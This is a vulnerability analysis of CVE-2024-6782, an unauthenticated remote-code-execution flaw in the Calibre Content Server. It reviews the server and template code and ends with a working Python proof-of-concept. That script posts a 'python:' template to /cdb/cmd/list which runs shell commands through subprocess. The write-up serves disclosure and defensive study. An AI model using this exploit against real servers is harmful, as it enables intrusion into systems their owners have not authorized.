Calibre CVE: CVE-2024-6782

Info

CVE Info

| Title | Description |
|---|---|
| Vendor | Calibre |
| Severity | Critical |
| Versions | 6.9.0 ~ 7.14.0 |
| CVE Description | Improper Access Control in Calibre Content Server allows remote code execution |
| NIST Description | Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution. |
| CWE Classification(s) | CWE-863: Incorrect Authorization |
| CAPEC Classification(s) | CAPEC-253: Remote Code Inclusion |
| CVSS 3.x Severity | 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| MITRE Date Record Created | 20240716 |

Reference:

Code Review

src/calibre/db/cli/cmd_list.py

1. SQL fields: database settings

readonly = True
version = 0  # change this if you change signature of implementation()
FIELDS = {
    'title', 'authors', 'author_sort', 'publisher', 'rating', 'timestamp', 'size',
    'tags', 'comments', 'series', 'series_index', 'formats', 'isbn', 'uuid',
    'pubdate', 'cover', 'last_modified', 'identifiers', 'languages', 'template'
}

FIELDS records the field names that may be requested.
readonly = True marks the module as read-only.

2. ebook format & path: formats() & cover()

def formats(db, book_id):
    for fmt in db.formats(book_id, verify_formats=False):
        path = db.format_abspath(book_id, fmt)
        if path:
            yield path.replace(os.sep, '/')


def cover(db, book_id):
    return db.format_abspath(book_id, '__COVER_INTERNAL__')

formats(db, book_id) yields every e-book format of a book; cover(db, book_id) returns its cover.
Both return absolute file paths.

3. sort fields: implementation(): query books from the database and return JSON

def implementation(
    db, notify_changes, fields, sort_by, ascending, search_text, limit, template=None
):
    is_remote = notify_changes is not None
    formatter = None
    with db.safe_read_lock:
        fm = db.field_metadata
        afields = set(FIELDS) | {'id'}
        for k in fm.custom_field_keys():
            afields.add('*' + k[1:])
        if 'all' in fields:
            fields = sorted(afields if template else (afields - {'template'}))
        sort_by = sort_by or 'id'
        sort_fields = sort_by.split(',')
        for sf in sort_fields:
            if sf not in afields:
                return f'Unknown sort field: {sf}'
        sort_spec = [(sf, ascending) for sf in sort_fields]
        if not set(fields).issubset(afields):
            return 'Unknown fields: {}'.format(', '.join(set(fields) - afields))
        if search_text:
            book_ids = db.multisort(sort_spec, ids_to_sort=db.search(search_text))
        else:
            book_ids = db.multisort(sort_spec)
        if limit > -1:
            book_ids = book_ids[:limit]
        data = {}
        metadata = {}
        for field in fields:
            if field in 'id':
                continue
            if field == 'isbn':
                x = db.all_field_for('identifiers', book_ids, default_value={})
                data[field] = {k: v.get('isbn') or '' for k, v in iteritems(x)}
                continue
            if field == 'template':
                vals = {}
                global_vars = {}
                if formatter is None:
                    from calibre.ebooks.metadata.book.formatter import SafeFormat
                    formatter = SafeFormat()
                for book_id in book_ids:
                    mi = db.get_proxy_metadata(book_id)
                    vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars)
                data['template'] = vals
                continue
            field = field.replace('*', '#')
            metadata[field] = fm[field]
            if not is_remote:
                if field == 'formats':
                    data[field] = {k: list(formats(db, k)) for k in book_ids}
                    continue
                if field == 'cover':
                    data[field] = {k: cover(db, k) for k in book_ids}
                    continue
            data[field] = db.all_field_for(field, book_ids)
    return {'book_ids': book_ids, "data": data, 'metadata': metadata, 'fields':fields}

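(v7.21.0) Checks notify_changes; the template field is disabled for remote execution.

Requested fields are validated against afields (all allowed fields), then the data is extracted field by field:

(1) id: skipped
(2) isbn: taken from the identifiers field
(3) template: if not disabled, a SafeFormat() formatter is created and applied to each book
(4) field name: * is replaced with #
(5) formats: calls formats() above for the format file paths (local calls only)
(6) cover: calls cover() above for the cover file path (local calls only)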
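The validation step can be sketched in isolation. This is a simplified stand-in, not calibre's code: FIELDS is shortened, and allowed_fields() and validate() are hypothetical helper names that only mirror the checks in the listing above.

```python
# Simplified sketch of the field validation in implementation().
# FIELDS is shortened and the helper names are hypothetical.
FIELDS = {'title', 'authors', 'isbn', 'template'}


def allowed_fields(custom_keys):
    """Built-in fields plus 'id'; custom '#name' keys are exposed as '*name'."""
    afields = set(FIELDS) | {'id'}
    for key in custom_keys:
        afields.add('*' + key[1:])
    return afields


def validate(fields, sort_by, afields):
    """Return an error string like the original, or None if the request is valid."""
    for sf in (sort_by or 'id').split(','):
        if sf not in afields:
            return f'Unknown sort field: {sf}'
    unknown = set(fields) - afields
    if unknown:
        return 'Unknown fields: {}'.format(', '.join(sorted(unknown)))
    return None


afields = allowed_fields(['#genre'])
print(validate(['title', '*genre'], 'title,id', afields))
print(validate(['title', 'bogus'], '', afields))
```

Note that 'template' passes this validation like any other field name; nothing here inspects the template text itself.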

fields & book_ids structure example:

{
    'title': {101: 'Harry Potter', 102: 'The Hobbit', 103: '1984'},
    'authors': {101: 'J.K. Rowling', 102: 'J.R.R. Tolkien', 103: 'George Orwell'},
    'isbn': {101: '9780747532743', 102: '9780547928227', 103: '9780451524935'}
}
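Because data is keyed by field first and book ID second, a consumer usually has to pivot it into one record per book. A minimal sketch, assuming the shape shown above; rows() is a hypothetical helper, not part of calibre.

```python
# Pivot the field -> {book_id: value} mapping into one dict per book.
data = {
    'title': {101: 'Harry Potter', 102: 'The Hobbit', 103: '1984'},
    'isbn': {101: '9780747532743', 102: '9780547928227', 103: '9780451524935'},
}
book_ids = [101, 102, 103]  # already sorted by implementation()


def rows(book_ids, data):
    """Return one record per book, preserving the order of book_ids."""
    return [
        {'id': bid, **{field: values.get(bid) for field, values in data.items()}}
        for bid in book_ids
    ]


for row in rows(book_ids, data):
    print(row)
```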

4. do_list(): output formatting

def do_list(
    dbctx,
    fields,
    afields,
    sort_by,
    ascending,
    search_text,
    line_width,
    separator,
    prefix,
    limit,
    template,
    template_file,
    template_title,
    for_machine=False
):
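  • CLI option_parser(): options for listing books
    • --fields: fields to display (custom fields are written as *name)
    • --sort-by: field(s) to sort by
    • --ascending: sort order (ascending or descending)
    • --search: search query used to filter the results
    • --line-width: maximum width of a single output line
    • --separator: string used to separate fields
    • --prefix: prefix for file paths
    • --limit: maximum number of results to display
    • --for-machine: output JSON
    • --template and --template_file: the template to run, given inline or as a path to a file
    • --template_heading: heading for the template column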

src/calibre/srv/cdb.py

REST API

1. cdb_run: command module

@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
{which}: module name
{version=0}: module version

@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_run(ctx, rd, which, version):
    try:
        m = module_for_cmd(which)
    except ImportError:
        raise HTTPNotFound(f'No module named: {which}')
    if not getattr(m, 'readonly', False):
        ctx.check_for_write_access(rd)
    if getattr(m, 'version', 0) != int(version):
        raise HTTPNotFound(('The module {} is not available in version: {}.'
                           'Make sure the version of calibre used for the'
                            ' server and calibredb match').format(which, version))
    db = get_library_data(ctx, rd, strict_library_id=True)[0]
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the command-line db interface with a user who has per library restrictions')
    raw = rd.read()
    ct = rd.inheaders.get('Content-Type', all=True)
    ct = {x.lower().partition(';')[0] for x in ct}
    try:
        if MSGPACK_MIME in ct:
            args = msgpack_loads(raw)
        elif 'application/json' in ct:
            args = json_loads(raw)
        else:
            raise HTTPBadRequest('Only JSON or msgpack requests are supported')
    except Exception:
        raise HTTPBadRequest('args are not valid encoded data')
    if getattr(m, 'needs_srv_ctx', False):
        args = [ctx] + list(args)
    try:
        result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args)
    except Exception as err:
        tb = ''
        if not getattr(err, 'suppress_traceback', False):
            import traceback
            tb = traceback.format_exc()
        return {'err': as_unicode(err), 'tb': tb}
    return {'result': result}

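Validates write access, module version, library_id, and per-library user restrictions.
Decodes the request body as msgpack or JSON, chosen by the Content-Type header; the response is post-processed by msgpack_or_json.
Calls implementation() with db, ctx.notify_changes, and the decoded args: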

result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args)
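The Content-Type handling in cdb_run can be tried out on its own. The sketch below reproduces only the header normalization and the JSON branch; the msgpack branch is left out, and decode_args() is a hypothetical name.

```python
import json


def decode_args(raw, content_types):
    """Normalize Content-Type values as cdb_run does, then decode a JSON body."""
    # Lower-case each header value and drop parameters such as '; charset=utf-8'.
    ct = {x.lower().partition(';')[0] for x in content_types}
    if 'application/json' in ct:
        return json.loads(raw)
    raise ValueError('Only JSON or msgpack requests are supported')


args = decode_args(b'[["title"], "", true, "", 10]',
                   ['Application/JSON; charset=utf-8'])
print(args)
```

The decoded list is passed positionally (*args) to implementation(), so its element order has to match fields, sort_by, ascending, search_text, limit, and optionally template.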

2. cdb_add_book: Add book

@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
{job_id}: task ID
{add_duplicates}: whether to add duplicate books
{filename}: file name of the book
{library_id}: target library

@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}',
          needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_add_book(ctx, rd, job_id, add_duplicates, filename, library_id):
    '''
    Add a file as a new book. The file contents must be in the body of the request.

    The response will also have the title/authors/languages read from the
    metadata of the file/filename. It will contain a `book_id` field specifying
    the id of the newly added book, or if add_duplicates is not specified and a
    duplicate was found, no book_id will be present, instead there will be a
    `duplicates` field specifying the title and authors for all duplicate
    matches. It will also return the value of `job_id` as the `id` field and
    `filename` as the `filename` field.
    '''
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions')
    if not filename:
        raise HTTPBadRequest('An empty filename is not allowed')
    sfilename = sanitize_file_name(filename)
    fmt = os.path.splitext(sfilename)[1]
    fmt = fmt[1:] if fmt else None
    if not fmt:
        raise HTTPBadRequest('An filename with no extension is not allowed')
    if isinstance(rd.request_body_file, BytesIO):
        raise HTTPBadRequest('A request body containing the file data must be specified')
    add_duplicates = add_duplicates in ('y', '1')
    path = os.path.join(rd.tdir, sfilename)
    rd.request_body_file.seek(0)
    with open(path, 'wb') as f:
        shutil.copyfileobj(rd.request_body_file, f)
    from calibre.ebooks.metadata.worker import run_import_plugins
    path = run_import_plugins((path,), time.monotonic_ns(), rd.tdir)[0]
    with open(path, 'rb') as f:
        mi = get_metadata(f, stream_type=os.path.splitext(path)[1][1:], use_libprs_metadata=True)
        f.seek(0)
        nfmt = os.path.splitext(path)[1]
        fmt = nfmt[1:] if nfmt else fmt
        ids, duplicates = db.add_books([(mi, {fmt: f})], add_duplicates=add_duplicates)
    ans = {'title': mi.title, 'authors': mi.authors, 'languages': mi.languages, 'filename': filename, 'id': job_id}
    if ids:
        ans['book_id'] = ids[0]
        ctx.notify_changes(db.backend.library_path, books_added(ids))
    else:
        ans['duplicates'] = [{'title': m.title, 'authors': m.authors} for m, _ in duplicates]
    return ans

Verifies the user's access to the library.
Checks the filename and its extension.
Extracts the book's metadata.
Checks for duplicates.
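The filename and extension check can be sketched as a standalone function. It assumes the name has already been sanitized (calibre's sanitize_file_name is not reproduced here), and format_from_filename() is a hypothetical name.

```python
import os


def format_from_filename(filename):
    """Derive the book format from the file extension, as cdb_add_book does."""
    if not filename:
        raise ValueError('An empty filename is not allowed')
    ext = os.path.splitext(filename)[1]
    fmt = ext[1:] if ext else None  # strip the leading dot
    if not fmt:
        raise ValueError('A filename with no extension is not allowed')
    return fmt


print(format_from_filename('book.epub'))
```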

3. cdb_delete_book: Delete book

@endpoint('/cdb/delete-books/{book_ids}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
{book_ids}: IDs of the books to delete
{library_id}: library ID

@endpoint('/cdb/delete-books/{book_ids}/{library_id=None}',
          needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_delete_book(ctx, rd, book_ids, library_id):
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the delete book interface with a user who has per library restrictions')
    try:
        ids = {int(x) for x in book_ids.split(',')}
    except Exception:
        raise HTTPBadRequest(f'invalid book_ids: {book_ids}')
    db.remove_books(ids)
    ctx.notify_changes(db.backend.library_path, books_deleted(ids))
    return {}

Verifies the user's access to the library.
notify_changes informs the server that the books were deleted.
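The {book_ids} path segment is a comma-separated string. A small sketch of the parsing step, with ValueError standing in for HTTPBadRequest; parse_book_ids() is a hypothetical name.

```python
def parse_book_ids(book_ids):
    """Turn '1,2,3' into {1, 2, 3}; any non-integer part rejects the whole request."""
    try:
        return {int(x) for x in book_ids.split(',')}
    except Exception:
        raise ValueError(f'invalid book_ids: {book_ids}')


print(parse_book_ids('1,2,2,10'))
```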

4. cdb_set_cover: Set cover

@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
{book_id}: ID of the book whose cover is set
{library_id}: library ID

@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int},
            needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_set_cover(ctx, rd, book_id, library_id):
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions')
    rd.request_body_file.seek(0)
    dirtied = db.set_cover({book_id: rd.request_body_file})
    ctx.notify_changes(db.backend.library_path, metadata(dirtied))
    return tuple(dirtied)

5. cdb_set_fields: Edit book

@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
{book_id}: ID of the book to edit
{library_id}: library ID

@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int},
          needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_set_fields(ctx, rd, book_id, library_id):
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the set fields interface with a user who has per library restrictions')
    data = load_payload_data(rd)
    try:
        changes, loaded_book_ids = data['changes'], frozenset(map(int, data.get('loaded_book_ids', ())))
        all_dirtied = bool(data.get('all_dirtied'))
        if not isinstance(changes, dict):
            raise TypeError('changes must be a dict')
    except Exception:
        raise HTTPBadRequest(
        '''Data must be of the form {'changes': {'title': 'New Title', ...}, 'loaded_book_ids':[book_id1, book_id2, ...]'}''')
    dirtied = set()
    cdata = changes.pop('cover', False)
    if cdata is not False:
        if cdata is not None:
            try:
                cdata = from_base64_bytes(cdata.split(',', 1)[-1])
            except Exception:
                raise HTTPBadRequest('Cover data is not valid base64 encoded data')
            try:
                fmt = what(None, cdata)
            except Exception:
                fmt = None
            if fmt not in ('jpeg', 'png'):
                raise HTTPBadRequest('Cover data must be either JPEG or PNG')
        dirtied |= db.set_cover({book_id: cdata})

    added_formats = changes.pop('added_formats', False)
    if added_formats:
        for data in added_formats:
            try:
                fmt = data['ext'].upper()
            except Exception:
                raise HTTPBadRequest('Format has no extension')
            if fmt:
                try:
                    fmt_data = from_base64_bytes(data['data_url'].split(',', 1)[-1])
                except Exception:
                    raise HTTPBadRequest('Format data is not valid base64 encoded data')
                if db.add_format(book_id, fmt, ReadOnlyFileBuffer(fmt_data)):
                    dirtied.add(book_id)
    removed_formats = changes.pop('removed_formats', False)
    if removed_formats:
        db.remove_formats({book_id: list(removed_formats)})
        dirtied.add(book_id)

    for field, value in iteritems(changes):
        dirtied |= db.set_field(field, {book_id: value})
    ctx.notify_changes(db.backend.library_path, metadata(dirtied))
    all_ids = dirtied if all_dirtied else (dirtied & loaded_book_ids)
    all_ids |= {book_id}
    return {bid: book_as_json(db, bid) for bid in all_ids}

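Verifies the user's access to the library; library_id selects the library.
Loads the request payload (JSON or msgpack).
Adds or removes formats: added_formats = changes.pop('added_formats', False) and removed_formats = changes.pop('removed_formats', False)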
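Cover and format payloads arrive as base64, optionally wrapped in a data URL. The sketch below shows the split-then-decode step with the standard library. base64.standard_b64decode and the magic-byte checks are stand-ins for calibre's from_base64_bytes and what() helpers, and decode_cover() is a hypothetical name.

```python
import base64

PNG_MAGIC = b'\x89PNG\r\n\x1a\n'
JPEG_MAGIC = b'\xff\xd8\xff'


def decode_cover(data_url):
    """Accept 'data:image/png;base64,....' or bare base64; return (format, bytes)."""
    # Everything after the first comma is the payload; with no comma the
    # whole string is treated as the payload.
    raw = base64.standard_b64decode(data_url.split(',', 1)[-1])
    if raw.startswith(PNG_MAGIC):
        return 'png', raw
    if raw.startswith(JPEG_MAGIC):
        return 'jpeg', raw
    raise ValueError('Cover data must be either JPEG or PNG')


payload = base64.b64encode(PNG_MAGIC + b'fake image body').decode()
print(decode_cover('data:image/png;base64,' + payload)[0])
```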

6. cdb_copy_to_library

@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')

@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True,
        postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_copy_to_library(ctx, rd, target_library_id, library_id):
    db_src = get_db(ctx, rd, library_id)
    db_dest = get_db(ctx, rd, target_library_id)
    if ctx.restriction_for(rd, db_src) or ctx.restriction_for(rd, db_dest):
        raise HTTPForbidden('Cannot use the copy to library interface with a user who has per library restrictions')
    data = load_payload_data(rd)
    try:
        book_ids = {int(x) for x in data['book_ids']}
        move_books = bool(data.get('move', False))
        preserve_date = bool(data.get('preserve_date', True))
        duplicate_action = data.get('duplicate_action') or 'add'
        automerge_action = data.get('automerge_action') or 'overwrite'
    except Exception:
        raise HTTPBadRequest('Invalid encoded data, must be of the form: {book_ids: [id1, id2, ..]}')
    if duplicate_action not in ('add', 'add_formats_to_existing', 'ignore'):
        raise HTTPBadRequest('duplicate_action must be one of: add, add_formats_to_existing, ignore')
    if automerge_action not in ('overwrite', 'ignore', 'new record'):
        raise HTTPBadRequest('automerge_action must be one of: overwrite, ignore, new record')
    response = {}
    identical_books_data = None
    if duplicate_action != 'add':
        identical_books_data = db_dest.data_for_find_identical_books()
    to_remove = set()
    from calibre.db.copy_to_library import copy_one_book
    for book_id in book_ids:
        try:
            rdata = copy_one_book(
                    book_id, db_src, db_dest, duplicate_action=duplicate_action, automerge_action=automerge_action,
                    preserve_uuid=move_books, preserve_date=preserve_date, identical_books_data=identical_books_data)
            if move_books:
                to_remove.add(book_id)
            response[book_id] = {'ok': True, 'payload': rdata}
        except Exception:
            import traceback
            response[book_id] = {'ok': False, 'payload': traceback.format_exc()}

    if to_remove:
        db_src.remove_books(to_remove, permanent=True)

    return response

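Verifies the user's access to both libraries.
db_src & db_dest: source and destination libraries

  1. duplicate_action: how duplicates are handled
  2. copy_one_book(...): copies each book; when move is set, the copied books are then removed from src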

Vulnerability Details

The REST API in cdb.py can route requests to cmd_list.py: a request to /cdb/cmd/list makes cdb.py load cmd_list.py dynamically and run its implementation() function.

cmd_list.py::implementation() is reached without verifying who supplied the input.

1. src/calibre/srv/cdb.py loads the module

@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_run(ctx, rd, which, version):
    try:
        m = module_for_cmd(which)
    except ImportError:
        raise HTTPNotFound(f'No module named: {which}')
    if not getattr(m, 'readonly', False):
        ctx.check_for_write_access(rd)
    if getattr(m, 'version', 0) != int(version):
        raise HTTPNotFound(('The module {} is not available in version: {}.'
                           'Make sure the version of calibre used for the'
                            ' server and calibredb match').format(which, version))

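As explained in the code review, {which} maps to the sub-path of the request.
For example, /cdb/cmd/list loads cmd_list.py.
If the module sets readonly = True, as cmd_list.py does, check_for_write_access(rd) is never called, so the permission check is bypassed.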
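The effect of the readonly flag can be modeled without calibre. In this sketch the modules are plain namespaces and gate() is a hypothetical function that copies only the branch structure of cdb_run; the real check_for_write_access() is reduced to a boolean.

```python
from types import SimpleNamespace


class AccessDenied(Exception):
    pass


def gate(module, user_can_write):
    """Only modules that are not marked readonly require write access."""
    if not getattr(module, 'readonly', False):
        if not user_can_write:
            raise AccessDenied('write access required')
    return 'implementation() runs'


cmd_list = SimpleNamespace(readonly=True)  # like cmd_list.py
writer_module = SimpleNamespace()          # hypothetical module without the flag

print(gate(cmd_list, user_can_write=False))
```

A caller without write access gets through for cmd_list, while the same caller is rejected for a module that lacks readonly = True. The flag describes database writes only, which is why a read-only command that evaluates templates falls outside the check.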

2. Forged template input

In cmd_list.py::implementation(), user input is treated as the template content

if field == 'template':
    vals = {}
    global_vars = {}
    if formatter is None:
        from calibre.ebooks.metadata.book.formatter import SafeFormat
        formatter = SafeFormat()
    for book_id in book_ids:
        mi = db.get_proxy_metadata(book_id)
        vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars)
    data['template'] = vals
    continue
field = field.replace('*', '#')
metadata[field] = fm[field]

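Any template that formatter.safe_format() parses successfully is accepted, so the template content is fully attacker-controlled.

3. Prefix handling in evaluate()

evaluate() in src/calibre/utils/formatter.py executes input that starts with the python: prefix as arbitrary Python code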

def evaluate(self, fmt, args, kwargs, global_vars, break_reporter=None):
    if fmt.startswith('program:'):
        ans = self._eval_program(kwargs.get('$', None), fmt[8:],
                                 self.column_name, global_vars, break_reporter)
    elif fmt.startswith('python:'):
        ans = self._eval_python_template(fmt[7:], self.column_name)
    else:
        ans = self.vformat(fmt, args, kwargs)
        if self.strip_results:
            ans = self.compress_spaces.sub(' ', ans)
    if self.strip_results:
        ans = ans.strip(' ')
    return ans
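The dispatch depends only on the literal prefix of the template string. A small classifier makes the three modes explicit; template_kind() is a hypothetical helper for illustration and evaluates nothing.

```python
def template_kind(fmt):
    """Classify a template the way evaluate() dispatches it, without running it."""
    if fmt.startswith('program:'):
        return 'program', fmt[8:]  # len('program:') == 8
    if fmt.startswith('python:'):
        return 'python', fmt[7:]   # len('python:') == 7
    return 'format', fmt


for t in ('{title}', 'program: field("title")', 'python:def evaluate(a, b): ...'):
    print(template_kind(t)[0])
```

A helper like this could support logging or filtering of incoming templates, but filtering by prefix is only a sketch of the idea and is not how the note above describes the fix.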

Proof-of-Concept (Ref: starlabs)

#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in calibre <= 7.14.0
# Written by: Amos Ng (@LFlare)
import json
import sys

import requests

_target = "http://localhost:8080"

def exploit(cmd):
    r = requests.post(
        f"{_target}/cdb/cmd/list",
        headers={"Content-Type": "application/json"},
        json=[
            ["template"],
            "", # sortby: leave empty
            "", # ascending: leave empty
            "", # search_text: leave empty, set to all
            1, # limit results
            f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
        ],
    )

    try:
        print(list(r.json()["result"]["data"]["template"].values())[0])
    except Exception as e:
        print(r.text)

if __name__ == "__main__":
    exploit("whoami")

Template contents

python:def evaluate(a, b):
    import subprocess
    try:
        return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()
    except Exception:
        return subprocess.check_output(['sh', '-c', '{cmd}']).decode()

Patch

https://github.com/kovidgoyal/calibre/commit/38a1bf50d8cd22052ae59c513816706c6445d5e9
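Going only by the note in the code review (template is disabled for remote execution in later versions), the mitigation can be sketched as below. This is an assumption-based illustration, not code copied from the commit; effective_template() is a hypothetical name.

```python
def effective_template(template, notify_changes):
    """Ignore any caller-supplied template when the call arrives via the server."""
    # Same test as in implementation(): the server always passes a callable,
    # the local CLI passes None.
    is_remote = notify_changes is not None
    return None if is_remote else template


print(effective_template('python:def evaluate(a, b): ...', lambda *a: None))
print(effective_template('{title}', None))
```

With the template forced to None for remote callers, the python: branch of evaluate() can no longer be reached through /cdb/cmd/list, while local calibredb use keeps working.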